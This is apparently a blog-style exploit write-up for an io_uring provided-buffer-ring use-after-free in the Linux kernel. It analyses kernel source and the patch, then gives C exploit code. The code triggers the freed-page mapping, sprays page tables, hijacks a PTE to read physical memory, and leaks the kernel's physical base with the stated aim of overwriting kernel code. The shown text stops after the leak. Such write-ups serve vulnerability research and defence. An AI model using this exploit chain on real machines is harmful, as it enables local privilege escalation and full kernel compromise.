Analysis

IO_URING register

  • io_uring_setup: Create an io_uring context, set up the SQ and CQ rings, and return a file descriptor.
  • io_uring_register: Register files or user buffers used for async I/O.
  • io_uring_enter: Submit new I/O requests (a minimal raw-syscall sketch of the three calls follows this list).
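
A minimal sketch (my own illustration, not from the original post; the exploit later uses liburing wrappers) showing how the three raw syscalls fit together:

#include <linux/io_uring.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
    struct io_uring_params params;
    memset(&params, 0, sizeof(params));

    /* io_uring_setup: create the context (SQ/CQ rings) and get an fd back */
    int fd = syscall(__NR_io_uring_setup, 8, &params);

    /* io_uring_register: register resources for async I/O
     * (illustrative only: with NULL/0 the kernel simply returns -EINVAL) */
    syscall(__NR_io_uring_register, fd, IORING_REGISTER_BUFFERS, NULL, 0);

    /* io_uring_enter: submit pending SQEs and/or wait for completions */
    syscall(__NR_io_uring_enter, fd, 0, 0, 0, NULL, 0);

    close(fd);
    return 0;
}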

io_uring_register is defined as:

SYSCALL_DEFINE4(io_uring_register, unsigned int, fd, unsigned int, opcode,
void __user *, arg, unsigned int, nr_args)

The core logic lives in __io_uring_register; this CVE focuses on the PBUF ring opcodes:

  static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;
...

switch (opcode) {
...
case IORING_REGISTER_PBUF_RING:
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_register_pbuf_ring(ctx, arg);
break;
case IORING_UNREGISTER_PBUF_RING:
ret = -EINVAL;
if (!arg || nr_args != 1)
break;
ret = io_unregister_pbuf_ring(ctx, arg);
break;
...
default:
ret = -EINVAL;
break;
}

return ret;
}

Registration: IORING_REGISTER_PBUF_RING

io_register_pbuf_ring uses io_uring_buf_reg as the structure for reading the registration data:

int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl, *free_bl = NULL;
int ret;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
...
}
struct io_uring_buf_reg {
__u64 ring_addr;
__u32 ring_entries;
__u16 bgid;
__u16 flags;
__u64 resv[3];
};

Some conditions have to be satisfied before it allocates the new buffer:

if (!is_power_of_2(reg.ring_entries))
return -EINVAL;

/* cannot disambiguate full vs empty due to head/tail size */
if (reg.ring_entries >= 65536)
return -EINVAL;
  • ring_entries must be a power of 2 and less than 65536

The list of pbufs is stored in an io_buffer_list object. reg.flags must contain IOU_PBUF_RING_MMAP to reach io_alloc_pbuf_ring, which allocates a new buffer instead of pinning an existing user buffer (io_pin_pbuf_ring).

bl = io_buffer_get_list(ctx, reg.bgid);
if (bl) {
/* if mapped buffer ring OR classic exists, don't allow */
if (bl->is_mapped || !list_empty(&bl->buf_list))
return -EEXIST;
} else {
free_bl = bl = kzalloc(sizeof(*bl), GFP_KERNEL);
if (!bl)
return -ENOMEM;
}

if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
ret = io_alloc_pbuf_ring(&reg, bl);

io_alloc_pbuf_ring uses __get_free_pages, where the order comes from get_order(ring_size), i.e. roughly ring_size / 0x1000 pages (for example, 256 entries × 16 bytes = 0x1000 bytes is a single order-0 page):

static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
if (!ptr)
return -ENOMEM;

bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
return 0;
}

As we can see, bl->buf_ring = ptr is a contiguous buffer holding the ring of io_uring_buf entries.

Here are the definitions of io_buffer_list, io_uring_buf_ring and io_uring_buf:


struct io_buffer_list {
/*
* If ->buf_nr_pages is set, then buf_pages/buf_ring are used. If not,
* then these are classic provided buffers and ->buf_list is used.
*/
union {
struct list_head buf_list;
struct {
struct page **buf_pages;
struct io_uring_buf_ring *buf_ring;
};
};
__u16 bgid;

/* below is for ring provided buffers */
__u16 buf_nr_pages;
__u16 nr_entries;
__u16 head;
__u16 mask;

/* ring mapped provided buffers */
__u8 is_mapped;
/* ring mapped provided buffers, but mmap'ed by application */
__u8 is_mmap;
};

struct io_uring_buf {
__u64 addr;
__u32 len;
__u16 bid;
__u16 resv;
};

struct io_uring_buf_ring {
union {
/*
* To avoid spilling into more pages than we need to, the
* ring tail is overlaid with the io_uring_buf->resv field.
*/
struct {
__u64 resv1;
__u32 resv2;
__u16 resv3;
__u16 tail;
};
__DECLARE_FLEX_ARRAY(struct io_uring_buf, bufs);
};
};

I can create a graph to simplify how bl works:
[figure: diagram of how bl works]

Unregistration: IORING_UNREGISTER_PBUF_RING

int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
{
struct io_uring_buf_reg reg;
struct io_buffer_list *bl;

if (copy_from_user(&reg, arg, sizeof(reg)))
return -EFAULT;
if (reg.resv[0] || reg.resv[1] || reg.resv[2])
return -EINVAL;
if (reg.flags)
return -EINVAL;

bl = io_buffer_get_list(ctx, reg.bgid);
if (!bl)
return -ENOENT;
if (!bl->is_mapped)
return -EINVAL;

__io_remove_buffers(ctx, bl, -1U);
if (bl->bgid >= BGID_ARRAY) {
xa_erase(&ctx->io_bl_xa, bl->bgid);
kfree(bl);
}
return 0;
}

The io_unregister_pbuf_ring function looks up the io_buffer_list via reg.bgid. After that, it calls __io_remove_buffers to remove the buffers:

static int __io_remove_buffers(struct io_ring_ctx *ctx,
struct io_buffer_list *bl, unsigned nbufs)
{
unsigned i = 0;
/* shouldn't happen */
if (!nbufs)
return 0;

if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
folio_put(virt_to_folio(bl->buf_ring));
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if (bl->buf_nr_pages) {
...
}
/* make sure it's seen as empty */
INIT_LIST_HEAD(&bl->buf_list);
bl->is_mapped = 0;
return i;
}

...

return i;
}

Since bl->is_mapped is set to 1 in io_alloc_pbuf_ring, __io_remove_buffers calls folio_put(virt_to_folio(bl->buf_ring)) to free the backing pages.

Since struct folio represents a group of contiguous struct page objects, it is natural to treat bl->buf_ring as a folio here.

Use: io_uring_mmap

To access the pbuf buffers from usermode, we can use io_uring_mmap.

io_uring_mmap is registered as the .mmap operation of the io_uring fd:

static const struct file_operations io_uring_fops = {
.release = io_uring_release,
.mmap = io_uring_mmap,
#ifndef CONFIG_MMU
.get_unmapped_area = io_uring_nommu_get_unmapped_area,
.mmap_capabilities = io_uring_nommu_mmap_capabilities,
#else
.get_unmapped_area = io_uring_mmu_get_unmapped_area,
#endif
.poll = io_uring_poll,
#ifdef CONFIG_PROC_FS
.show_fdinfo = io_uring_show_fdinfo,
#endif
};

io_uring_mmap calls io_uring_validate_mmap_request to validate our request. The physical address of the returned buffer is then used to map the requested virtual address range:

static __cold int io_uring_mmap(struct file *file, struct vm_area_struct *vma)
{
size_t sz = vma->vm_end - vma->vm_start;
unsigned long pfn;
void *ptr;

ptr = io_uring_validate_mmap_request(file, vma->vm_pgoff, sz);
if (IS_ERR(ptr))
return PTR_ERR(ptr);

pfn = virt_to_phys(ptr) >> PAGE_SHIFT;
return remap_pfn_range(vma, vma->vm_start, pfn, sz, vma->vm_page_prot);
}

To map the pbuf buffer, the mmap offset must contain the IORING_OFF_PBUF_RING flag:

static void *io_uring_validate_mmap_request(struct file *file,
loff_t pgoff, size_t sz)
{
struct io_ring_ctx *ctx = file->private_data;
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

switch (offset & IORING_OFF_MMAP_MASK) {
...
case IORING_OFF_PBUF_RING: {
unsigned int bgid;

bgid = (offset & ~IORING_OFF_MMAP_MASK) >> IORING_OFF_PBUF_SHIFT;
mutex_lock(&ctx->uring_lock);
ptr = io_pbuf_get_address(ctx, bgid);
mutex_unlock(&ctx->uring_lock);
if (!ptr)
return ERR_PTR(-EINVAL);
break;
}
default:
return ERR_PTR(-EINVAL);
}

page = virt_to_head_page(ptr);
if (sz > page_size(page))
return ERR_PTR(-EINVAL);

return ptr;
}

From this, we can write a usermode function to allocate and use pbuf buffers:

void *register_pbuf(struct io_uring *ring, u32 ring_entries, u32 flags,
u32 bgid) {
struct io_uring_buf_reg buf_reg = {
.ring_entries = ring_entries,
.ring_addr = 0,
.bgid = bgid,
.flags = flags,
.resv = {0, 0, 0},
};

int ret = SAFE(io_uring_register_buf_ring(ring, &buf_reg, 0));
off64_t offset = IORING_OFF_PBUF_RING | (uint64_t)bgid
<< IORING_OFF_PBUF_SHIFT;
/*
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

switch (offset & IORING_OFF_MMAP_MASK)
...
case IORING_OFF_PBUF_RING: {
unsigned int bgid;
bgid = (offset & ~IORING_OFF_MMAP_MASK) >>
IORING_OFF_PBUF_SHIFT;
*/
void *addr = mmap(NULL, (buf_reg.ring_entries) * sizeof(struct io_uring_buf),
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd, offset);
if (addr == MAP_FAILED) {
perror("mmap");
}
return addr;
}

The bug

As we can see, io_unregister_pbuf_ring never checks whether the pbuf buffer is still mapped into any usermode address. Taking advantage of this, an attacker can keep accessing the pbuf buffer through the existing mmap mapping even after the buffer is freed, which causes a use-after-free (at the page level).
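
To make the primitive concrete, here is a condensed single-buffer sketch (my own illustration built on liburing, assuming a vulnerable kernel; the full exploit below sprays many buffer rings instead):

#include <liburing.h>
#include <sys/mman.h>

int main(void)
{
    struct io_uring ring;
    io_uring_queue_init(4, &ring, 0);

    /* 1. register a kernel-allocated (IOU_PBUF_RING_MMAP) provided-buffer ring */
    struct io_uring_buf_reg reg = {
        .ring_entries = 256, .bgid = 0, .flags = IOU_PBUF_RING_MMAP,
    };
    io_uring_register_buf_ring(&ring, &reg, 0);

    /* 2. map the ring into userspace via the IORING_OFF_PBUF_RING offset */
    void *p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
                   ring.ring_fd, IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
    if (p == MAP_FAILED)
        return 1;

    /* 3. unregister: the backing page is freed, but the mapping stays alive */
    io_uring_unregister_buf_ring(&ring, 0);

    /* 4. use-after-free: the freed physical page is still readable/writable */
    *(volatile unsigned long *)p = 0x4141414141414141UL;
    return 0;
}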

The patch

Reading the commit, we can summarize the patch:

  • Add a new field (a deferred free list) to io_ring_ctx to track the buffer-ring pages:


    diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
    index d3009d56af0ba3..805bb635cdf558 100644
    --- a/include/linux/io_uring_types.h
    +++ b/include/linux/io_uring_types.h
    @@ -340,6 +340,9 @@ struct io_ring_ctx {

    struct list_head io_buffers_cache;

    + /* deferred free list, protected by ->uring_lock */
    + struct hlist_head io_buf_list;
  • Stop freeing the pages in __io_remove_buffers; let io_kbuf_mmap_list_free do that at ->release() time:

    diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
    index e40b1143821045..3a216f0744dd66 100644
    --- a/io_uring/io_uring.c
    +++ b/io_uring/io_uring.c
    ...
    @@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
    ctx->mm_account = NULL;
    }
    io_rings_free(ctx);
    + io_kbuf_mmap_list_free(ctx);

    percpu_ref_exit(&ctx->refs);
    free_uid(ctx->user);

    diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
    index a1e4239c7d75d1..85e680fc74ce2c 100644
    --- a/io_uring/kbuf.c
    +++ b/io_uring/kbuf.c
    @@ -33,6 +33,11 @@ struct io_provide_buf {
    __u16 bid;
    };

    +struct io_buf_free {
    + struct hlist_node list;
    + void *mem;
    +};
    +
    static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
    unsigned int bgid)
    {
    @@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
    if (bl->is_mapped) {
    i = bl->buf_ring->tail - bl->head;
    if (bl->is_mmap) {
    - folio_put(virt_to_folio(bl->buf_ring));
    + /*
    + * io_kbuf_list_free() will free the page(s) at
    + * ->release() time.
    + */
    bl->buf_ring = NULL;
    bl->is_mmap = 0;
    } else if (bl->buf_nr_pages) {
    @@ -531,18 +539,28 @@ error_unpin:
    return -EINVAL;
    }
    ...
    +void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
    +{
    + struct io_buf_free *ibf;
    + struct hlist_node *tmp;
    +
    + hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
    + hlist_del(&ibf->list);
    + io_mem_free(ibf->mem);
    + kfree(ibf);
    + }
    +}

Exploit

Trigger the bug

Just allocate a lot of pbuf buffers, map them via mmap, and unregister them:

#define ENTRIES 4
#define PAGE_SIZE 0x1000

void *register_pbuf(struct io_uring *ring, u32 ring_entries, u32 flags,
u32 bgid) {
struct io_uring_buf_reg buf_reg = {
.ring_entries = ring_entries,
.ring_addr = 0,
.bgid = bgid,
.flags = flags,
.resv = {0, 0, 0},
};

int ret = SAFE(io_uring_register_buf_ring(ring, &buf_reg, 0));
off64_t offset = IORING_OFF_PBUF_RING | (uint64_t)bgid
<< IORING_OFF_PBUF_SHIFT;
/*
loff_t offset = pgoff << PAGE_SHIFT;
struct page *page;
void *ptr;

switch (offset & IORING_OFF_MMAP_MASK)
...
case IORING_OFF_PBUF_RING: {
unsigned int bgid;
bgid = (offset & ~IORING_OFF_MMAP_MASK) >>
IORING_OFF_PBUF_SHIFT;
*/
void *addr = mmap(NULL, (buf_reg.ring_entries) * sizeof(struct io_uring_buf),
PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE,
ring->ring_fd, offset);
if (addr == MAP_FAILED) {
perror("mmap");
}
return addr;
}

#define NR_PAGES 0x80
#define PIPE_NR 0x50
#define PAGE_NR 0x100
void *pages[PAGE_NR];

int main(int argc, char **argv, char **envp) {
struct io_uring ring;
pin_cpu(0);

SAFE(io_uring_queue_init(ENTRIES, &ring, 0));

logInfo("%d", ring.ring_fd);
void **laddrs = calloc(NR_PAGES, sizeof(char *));

for (uint i = 0; i < NR_PAGES; ++i) {
laddrs[i] = register_pbuf(&ring, PAGE_SIZE / sizeof(struct io_uring_buf),
IOU_PBUF_RING_MMAP, i);
logInfo("%p", laddrs[i]);
}

for (uint i = 0; i < NR_PAGES; ++i) {
int ret = SAFE(io_uring_unregister_buf_ring(&ring, i));
}
...
}

At this point, the pages backing the addresses in laddrs have been freed but can still be accessed.
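
A quick, hypothetical sanity check (reusing the exploit's uint/u64 typedefs and the laddrs array) is to touch each stale mapping; none of these reads should fault even though the backing pages have already been returned to the page allocator:

/* hypothetical check: the stale mappings in laddrs[] are still usable */
for (uint i = 0; i < NR_PAGES; ++i) {
    volatile u64 *probe = (volatile u64 *)laddrs[i];
    (void)*probe; /* reads a freed physical page without faulting */
}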

Spray PTE

To get a PTE (Page Table Entry) allocated inside one of the UAF pages, we can call mmap many times:

...
for (uint i = 0; i < PAGE_NR; ++i) {
pages[i] = mmap((void *)0x13370000 + 0x10 * PAGE_SIZE * i, PAGE_SIZE,
PROT_READ | PROT_WRITE,
MAP_ANON | MAP_SHARED | MAP_FIXED_NOREPLACE, -1, 0);
if (pages[i] == MAP_FAILED) {
logErr("mmap");
break;
}
mlock(pages[i], PAGE_SIZE);
memset(pages[i], 0x41, 0x10);
}
...

To check whether any page in laddrs now holds a PTE, we have to know what a PTE value looks like.

I use my custom script to get PTE from a virtual address:

[figure: PTE dump produced by the custom script]

In this example, the physical address of the page is 0x105179000 and the PTE value is 0x8000000105179227, which encodes 0x105179000 with the flags PRESENT|RW|USERMODE|ACCESSED|DIRTY|NX.

To understand why the PTE has that value, you can refer to this paper.
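
To make the encoding concrete, here is a small decoder sketch (my own helper, not part of the original exploit) that splits a raw x86-64 PTE into the physical frame address and the flag bits used below:

#include <stdint.h>
#include <stdio.h>

/* the physical frame address lives in bits 12..51 of an x86-64 PTE */
#define PTE_PFN_MASK 0x000ffffffffff000ULL

static void decode_pte(uint64_t pte)
{
    printf("phys     = 0x%llx\n", (unsigned long long)(pte & PTE_PFN_MASK));
    printf("present  = %d\n", (int)(pte >> 0) & 1);
    printf("rw       = %d\n", (int)(pte >> 1) & 1);
    printf("user     = %d\n", (int)(pte >> 2) & 1);
    printf("accessed = %d\n", (int)(pte >> 5) & 1);
    printf("dirty    = %d\n", (int)(pte >> 6) & 1);
    printf("nx       = %d\n", (int)(pte >> 63) & 1);
}

int main(void)
{
    decode_pte(0x8000000105179227ULL); /* the value from the dump above */
    return 0;
}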

We can write a filter to find candidate PTEs:

#define _PAGE_BIT_PRESENT 0
#define _PAGE_BIT_RW 1
#define _PAGE_BIT_USER 2
#define _PAGE_BIT_ACCESSED 5
#define _PAGE_BIT_DIRTY 6
#define _PAGE_BIT_NX 63

#define _PAGE_PRESENT (1UL << _PAGE_BIT_PRESENT)
#define _PAGE_RW (1UL << _PAGE_BIT_RW)
#define _PAGE_USER (1UL << _PAGE_BIT_USER)
#define _PAGE_ACCESSED (1UL << _PAGE_BIT_ACCESSED)
#define _PAGE_DIRTY (1UL << _PAGE_BIT_DIRTY)
#define _PAGE_NX (1UL << _PAGE_BIT_NX)

for (uint i = 0; i < NR_PAGES; ++i) {
int PTE = *(int *)laddrs[i];
if ((PTE & _PAGE_PRESENT) && (PTE & _PAGE_RW) && (PTE & _PAGE_USER)) {
logInfo("PTE: %p", laddrs[i]);
while(1){
; // Using to reference on debugger
}
}
}

As we can see, I found a PTE belonging to the page at virtual address 0x14200000:

[figure: the leaked PTE for the page at virtual address 0x14200000]

Finding the physical address of the kernel

kASLR also randomizes the physical address of the kernel, so we have to find a way to recover it if we want to modify the kernel's text.

If you just want to know the technique, read this blog. From here on, I want to explain in detail why the author can rely on those magic numbers.

There are two conditions for the physical address we want to find:

  • It is fixed, whether kASLR is enabled or not
  • It must contain data related to the kernel's physical address, e.g. a PTE or another value at a fixed offset from the kernel's physical base.

After finding where the kernel chooses its random address, I want to check what it does afterwards.

I backtraced which function calls find_random_phys_addr, and this is the result I found:

extract_kernel -> choose_random_location -> find_random_phys_addr.

After extracting the kernel successfully, it jumps to the kernel entry point:

	call	extract_kernel		/* returns kernel entry point in %rax */

/*
* Jump to the decompressed kernel.
*/
movq %r15, %rsi
jmp *%rax
SYM_FUNC_END(.Lrelocated)

setup_arch

This function is called from start_kernel. I chose it because it calls many interesting functions such as kernel_randomize_memory, early_alloc_pgt_buf, reserve_brk, reserve_real_mode, and init_mem_mapping. These functions may help me find which fixed physical addresses contain data related to the kernel's physical address.

void __init setup_arch(char **cmdline_p)
{

...
early_reserve_memory();

...
kernel_randomize_memory();

...

early_alloc_pgt_buf();

/*
* Need to conclude brk, before e820__memblock_setup()
* it could use memblock_find_in_range, could overlap with
* brk area.
*/
reserve_brk();

...

x86_platform.realmode_reserve();
init_mem_mapping();

...
}

kernel_randomize_memory

This function randomizes the well-known virtual bases page_offset_base, vmalloc_base, and vmemmap_base:

static __initdata struct kaslr_memory_region {
unsigned long *base;
unsigned long size_tb;
} kaslr_regions[] = {
{ &page_offset_base, 0 },
{ &vmalloc_base, 0 },
{ &vmemmap_base, 0 },
};

/* Get size in bytes used by the memory region */
static inline unsigned long get_padding(struct kaslr_memory_region *region)
{
return (region->size_tb << TB_SHIFT);
}

/* Initialize base and padding for each memory region randomized with KASLR */
void __init kernel_randomize_memory(void)
{
size_t i;
unsigned long vaddr_start, vaddr;
unsigned long rand, memory_tb;
struct rnd_state rand_state;
unsigned long remain_entropy;
unsigned long vmemmap_size;

vaddr_start = pgtable_l5_enabled() ? __PAGE_OFFSET_BASE_L5 :
__PAGE_OFFSET_BASE_L4;
vaddr = vaddr_start;
...
prandom_seed_state(&rand_state, kaslr_get_random_long("Memory"));

for (i = 0; i < ARRAY_SIZE(kaslr_regions); i++) {
unsigned long entropy;

/*
* Select a random virtual address using the extra entropy
* available.
*/
entropy = remain_entropy / (ARRAY_SIZE(kaslr_regions) - i);
prandom_bytes_state(&rand_state, &rand, sizeof(rand));
entropy = (rand % (entropy + 1)) & PUD_MASK;
vaddr += entropy;
*kaslr_regions[i].base = vaddr;

printk("Address from 0x%lx to 0x%lx", vaddr - entropy, vaddr);

...
}
}

early_alloc_pgt_buf

In early_alloc_pgt_buf, I added some printk lines to get more details about what this function does, since debugging with gdb is hard when kASLR is enabled.

void __init early_alloc_pgt_buf(void)
{
unsigned long tables = INIT_PGT_BUF_SIZE;
phys_addr_t base;

printk("text_base = 0x%lx", __pa(_text));
printk("brk_base = 0x%lx", __pa(__brk_base));

base = __pa(extend_brk(tables, PAGE_SIZE));

pgt_buf_start = base >> PAGE_SHIFT;
pgt_buf_end = pgt_buf_start;
pgt_buf_top = pgt_buf_start + (tables >> PAGE_SHIFT);
printk("pgt_buf_end = 0x%lx", pgt_buf_end << PAGE_SHIFT);
}

We can see that it extends the brk by INIT_PGT_BUF_SIZE bytes for the pgt_buf area. From the function's description, this new memory is used for the page tables that map the physical range [0, 0x100000].

[figure: printk output showing text_base, brk_base and pgt_buf_end]

realmode_reserve

This function allocates the buffer for real mode (Linux stores its address in the global real_mode_header variable):

void __init reserve_real_mode(void)
{
phys_addr_t mem;
size_t size = real_mode_size_needed();

if (!size)
return;

WARN_ON(slab_is_available());

/* Has to be under 1M so we can execute real-mode AP code. */
mem = memblock_phys_alloc_range(size, PAGE_SIZE, 0, 1 << 20);
printk("real_mode = 0x%lx (phys)\n", mem); // I added this
if (!mem)
pr_info("No sub-1M memory is available for the trampoline\n");
else
set_real_mode_mem(mem);

/*
* Unconditionally reserve the entire fisrt 1M, see comment in
* setup_arch().
*/
memblock_reserve(0, SZ_1M);
}

The value of mem should be fixed and below 0x100000 (1 MiB).

I added a printk line to print its value and found that it always equals 0x98000.

init_mem_mapping

This function maps the physical range [0, 0x100000] and also initializes the trampoline.

void __init init_mem_mapping(void)
{
unsigned long end;

pti_check_boottime_disable();
probe_page_size_mask();
setup_pcid();

#ifdef CONFIG_X86_64
end = max_pfn << PAGE_SHIFT;
#else
end = max_low_pfn << PAGE_SHIFT;
#endif

/* the ISA range is always mapped regardless of memory holes */
init_memory_mapping(0, ISA_END_ADDRESS, PAGE_KERNEL);

/* Init the trampoline, possibly with KASLR memory offset */
init_trampoline();

...
}

As I said in the early_alloc_pgt_buf section, the page at [brk_base, brk_base+0x1000] will be used for mapping [0, 0x100000]. Let's dive into init_memory_mapping to check whether the [brk_base, brk_base+0x1000] page really gets used or not.

init_memory_mapping

This is the call stack down to the code that initializes the page table for [0, 0x100000]:

init_memory_mapping
-> kernel_physical_mapping_init
-> __kernel_physical_mapping_init

In function __kernel_physical_mapping_init, the pgd value is from:

pgd_t *pgd = pgd_offset_k(vaddr);

In this case, vaddr = page_offset_base because paddr_start = 0.
To determine the value of pgd, I have to find the definition of pgd_offset_k:

#ifndef pgd_offset_k
#define pgd_offset_k(address) pgd_offset(&init_mm, (address))
#endif

#ifndef pgd_offset
#define pgd_offset(mm, address) pgd_offset_pgd((mm)->pgd, (address))
#endif

static inline pgd_t *pgd_offset_pgd(pgd_t *pgd, unsigned long address)
{
return (pgd + pgd_index(address));
};

#ifndef pgd_index
/* Must be a compile-time constant, so implement it as a macro */
#define pgd_index(a) (((a) >> PGDIR_SHIFT) & (PTRS_PER_PGD - 1))
#endif

struct mm_struct init_mm = {
.mm_mt = MTREE_INIT_EXT(mm_mt, MM_MT_FLAGS, init_mm.mmap_lock),
.pgd = swapper_pg_dir,
.mm_users = ATOMIC_INIT(2),
.mm_count = ATOMIC_INIT(1),
.write_protect_seq = SEQCNT_ZERO(init_mm.write_protect_seq),
MMAP_LOCK_INITIALIZER(init_mm)
.page_table_lock = __SPIN_LOCK_UNLOCKED(init_mm.page_table_lock),
.arg_lock = __SPIN_LOCK_UNLOCKED(init_mm.arg_lock),
.mmlist = LIST_HEAD_INIT(init_mm.mmlist),
#ifdef CONFIG_PER_VMA_LOCK
.mm_lock_seq = 0,
#endif
.user_ns = &init_user_ns,
.cpu_bitmap = CPU_BITS_NONE,
#ifdef CONFIG_IOMMU_SVA
.pasid = IOMMU_PASID_INVALID,
#endif
INIT_MM_CONTEXT(init_mm)
};

extern pgd_t init_top_pgt[];

#define swapper_pg_dir init_top_pgt

In short,

pgd = init_top_pgt + ((page_offset_base >> 39) & (512 - 1)) * 8

so pgd's address sits at a fixed offset from the kernel's address (init_top_pgt is part of the kernel image).
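
As a quick back-of-the-envelope check (my own, using the default non-randomized direct-map base 0xffff888000000000 and 8-byte pgd entries):

#include <stdio.h>

int main(void)
{
    unsigned long base = 0xffff888000000000UL; /* default __PAGE_OFFSET_BASE_L4 */
    unsigned long idx  = (base >> 39) & 511;   /* pgd_index(base) */
    printf("pgd_index = %lu, byte offset = 0x%lx\n", idx, idx * 8);
    /* prints: pgd_index = 273, byte offset = 0x888 */
    return 0;
}

With kASLR's memory randomization the chosen base (and therefore the index) changes, but pgd is always an entry inside init_top_pgt, which itself sits at a fixed offset inside the kernel image.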

After that, the function uses alloc_low_page to allocate memory for p4d:

p4d = alloc_low_page();

p4d is at pgt_buf_end+0x1000:

[figure: debug output showing p4d's address]

__ref void *alloc_low_pages(unsigned int num)
{
unsigned long pfn;
int i;

if (after_bootmem) {
...
}

if ((pgt_buf_end + num) > pgt_buf_top || !can_use_brk_pgt) {
...
} else {
pfn = pgt_buf_end;
pgt_buf_end += num;
}

for (i = 0; i < num; i++) {
....
}

return __va(pfn << PAGE_SHIFT);
}

So p4d's physical address is pgt_buf_end << PAGE_SHIFT (with pgt_buf_end's value at allocation time).

__kernel_physical_mapping_init then sets up p4d as the next-level page table for [0, 0x100000]:

paddr_last = phys_p4d_init(p4d, __pa(vaddr), __pa(vaddr_end),
page_size_mask, prot, init);

and stores p4d into the pgd entry:

p4d_populate_init(&init_mm, p4d_offset(pgd, vaddr),
(pud_t *)p4d, init);

[figures: page-table dumps showing the pgd entry pointing to p4d and the next-level paging structures for [0, 0x100000]]

init_trampoline

static void __init init_trampoline(void)
{
#ifdef CONFIG_X86_64
/*
* The code below will alias kernel page-tables in the user-range of the
* address space, including the Global bit. So global TLB entries will
* be created when using the trampoline page-table.
*/
if (!kaslr_memory_enabled())
trampoline_pgd_entry = init_top_pgt[pgd_index(__PAGE_OFFSET)];
else
init_trampoline_kaslr();
#endif
}

So, without kASLR, trampoline_pgd_entry equals the p4d value …

void __meminit init_trampoline_kaslr(void)
{
pud_t *pud_page_tramp, *pud, *pud_tramp;
p4d_t *p4d_page_tramp, *p4d, *p4d_tramp;
unsigned long paddr, vaddr;
pgd_t *pgd;

pud_page_tramp = alloc_low_page();

/*
* There are two mappings for the low 1MB area, the direct mapping
* and the 1:1 mapping for the real mode trampoline:
*
* Direct mapping: virt_addr = phys_addr + PAGE_OFFSET
* 1:1 mapping: virt_addr = phys_addr
*/
paddr = 0;
vaddr = (unsigned long)__va(paddr); // PAGE_OFFSET
pgd = pgd_offset_k(vaddr);

p4d = p4d_offset(pgd, vaddr);
pud = pud_offset(p4d, vaddr);

pud_tramp = pud_page_tramp + pud_index(paddr);//
*pud_tramp = *pud;

if (pgtable_l5_enabled()) {
...
} else {
trampoline_pgd_entry =
__pgd(_KERNPG_TABLE | __pa(pud_page_tramp));
}
}

… or, with kASLR, p4d's value + 0x3000 (because 2 more pages were allocated in between for the lower-level tables).

Summary:

[figure: summary diagram of the fixed physical-address relationships]

Now, I just need to find out whether trampoline_pgd_entry's value is stored somewhere in the physical range [0x0, 0x100000].

setup_real_mode

The real_mode_header buffer is always at physical address 0x98000.

In setup_real_mode, we can see that it stores trampoline_pgd_entry at real_mode_header->trampoline_pgd:

static void __init setup_real_mode(void)
{
...

base = (unsigned char *)real_mode_header;

...
memcpy(base, real_mode_blob, size);

...
trampoline_pgd = (u64 *) __va(real_mode_header->trampoline_pgd);

/* Map the real mode stub as virtual == physical */
trampoline_pgd[0] = trampoline_pgd_entry.pgd;

/*
* Include the entirety of the kernel mapping into the trampoline
* PGD. This way, all mappings present in the normal kernel page
* tables are usable while running on trampoline_pgd.
*/
for (i = pgd_index(__PAGE_OFFSET); i < PTRS_PER_PGD; i++)
trampoline_pgd[i] = init_top_pgt[i].pgd;
...
}

After some relocations, I can see trampoline_pgd's physical address is 0x9c000:

pwndbg> p/x *real_mode_header
$18 = {
text_start = 0x99000,
ro_end = 0x9a204,
trampoline_start = 0x99000,
trampoline_header = 0x9d000,
sev_es_trampoline_start = 0x99050,
trampoline_start64 = 0x9a1f0,
trampoline_pgd = 0x9c000,
wakeup_start = 0x99200,
wakeup_header = 0x9b010,
machine_real_restart_asm = 0x9a190,
machine_real_restart_seg = 0x8
}

That means we can read the physical address 0x9c000 to leak trampoline_pgd_entry. Depending on whether kASLR is enabled or not, we can then calculate __brk_base's address and also the kernel's physical address!

Final graph:

[figure: final graph of the physical-address leak chain]

Leaking the kernel's address and overwriting code

Overwrite the victim's PTE so that it points to physical address 0x9c000, then read the victim page to leak the kernel's physical address:

*pte = 0x800000000009c067;
u64 addr = -1;
void *target = NULL;
for (uint i = 0; i < PAGE_NR; ++i) {
addr = *(u64 *)pages[i];
if (addr != 0x4141414141414141) {
target = pages[i];
logErr("victim = %p", target);
break;
}
}

addr = addr & (~0xffULL);
#define KASLR 1
u64 physkBase = addr - 0x3e00000 - 0x1000;
if (KASLR)
physkBase -= 0x3000;

logInfo("physkBase: 0x%lx", physkBase);

